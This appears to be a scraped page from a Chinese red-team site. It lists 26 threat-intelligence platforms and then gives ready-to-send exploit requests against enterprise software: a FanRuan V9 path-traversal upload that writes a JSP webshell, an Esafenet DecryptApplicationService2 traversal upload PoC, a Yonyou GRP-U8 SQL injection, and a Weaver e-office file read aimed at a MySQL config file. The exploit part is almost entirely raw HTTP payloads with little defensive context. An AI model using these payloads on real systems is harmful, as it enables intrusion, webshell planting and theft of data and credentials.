Quan


Threat Intelligence
26 threat-intelligence-related websites

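1. ThreatBook X (微步X): ThreatBook X Intelligence Community, threat intelligence lookup, threat analysis platform, open community
2. DAS-Security Star Map (安恒星图): Security Star Map platform
3. QiAnXin (奇安信): QiAnXin Threat Intelligence Center
4. Intelligence Planet (情报星球): community for exchanging and sharing security intelligence
5. Tianji Youmeng (天际友盟) RedQueen security intelligence service platform: RedQueen Threat Intelligence Center
6. VenusEye Threat Intelligence Center
7. NSFOCUS (绿盟) NTI Threat Intelligence Center: NTI - Threat Intelligence Center
8. 360 Threat Intelligence Center: 360 Security Brain
9. Antiy (安天) Threat Intelligence Center: https://www.antiycloud.com/
10. IBM X-Force: IBM X-Force Exchange
11. VirusTotal
12. SANS Internet Storm Center: SANS.edu Internet Storm Center - SANS Internet Storm Center
13. ThreatCrowd, open-source threat intelligence: https://www.threatcrowd.org/
14. ThreatMiner: ThreatMiner.org | Data Mining for Threat Intelligence
15. GreyNoise: GreyNoise is the source for understanding internet noise
16. CT Stack security community
17. Tencent Security (腾讯安全): https://tix.qq.com/
18. CNTD cybersecurity threat intelligence sharing platform
19. Dolphin Intelligence Assistant (海豚情报助手): Dolphin Threat Intelligence Platform
20. Xianzhi (先知): technical articles - Xianzhi Community
21. Sangfor (深信服): https://ti.sangfor.com.cn/analysis-platform
22. Eagle Eye Duba (鹰眼毒霸): Eagle Eye Threat Intelligence
23. Hillstone Yunzhan (山石云瞻)
24. BadIP: https://www.badip.com/
25. MISP, open-source threat intelligence sharing platform: GitHub - MISP/MISP: MISP (core software) - Open Source Threat Intelligence Platform
26. Threat intelligence management platform: https://ti.watcherlab.com/#/search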


https://www.redteam.wang
Threat Intelligence
FanRuan (帆软) V9 file upload

EXP
POST /seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/shell.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Host: x.x.x.x
Content-Length: 75

{"__CONTENT__": "JSPWebshell", "__CHARSET__": "UTF-8"}


https://mp.weixin.qq.com/s?__biz=MzkwOTIzODg0MA==&mid=2247490375&idx=1&sn=4e98e7835d06117e3c5e381878eda543
Threat Intelligence
Esafenet (亿赛通) | DecryptApplicationService2 file upload (with PoC)

POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/test.jsp HTTP/1.1
Host: xxxx
Cookie: JSESSIONID=E13D850E18BD224E56ABE1DC1D4FD13D
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 5

hello


https://mp.weixin.qq.com/s?__biz=Mzg2ODg3NzExNw==&mid=2247486183&idx=1&sn=8f8c7b9838cda02b88aa1cda3f61f1e2
Threat Intelligence
Yonyou (用友) GRP-U8 bx_historyDataCheck.jsp SQL injection vulnerability

POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A2BF47E766B3CFCFA6BB152CC6C175B9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

userName=*


https://mp.weixin.qq.com/s?__biz=MzIzOTM2MzczNQ==&mid=2247483909&idx=1&sn=85d193a38c0b9c72d5220e69c8db83fa
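Threat Intelligence
Weaver (泛微) e-office OfficeServer2.php arbitrary file read vulnerability reproduction

Weaver e-office OfficeServer2.php has an arbitrary file read vulnerability. An attacker can use it to obtain sensitive information in preparation for further attacks.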
iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../../bin/mysql_config.ini


https://mp.weixin.qq.com/s/d0qeCCZfNirROMJeKeYtSg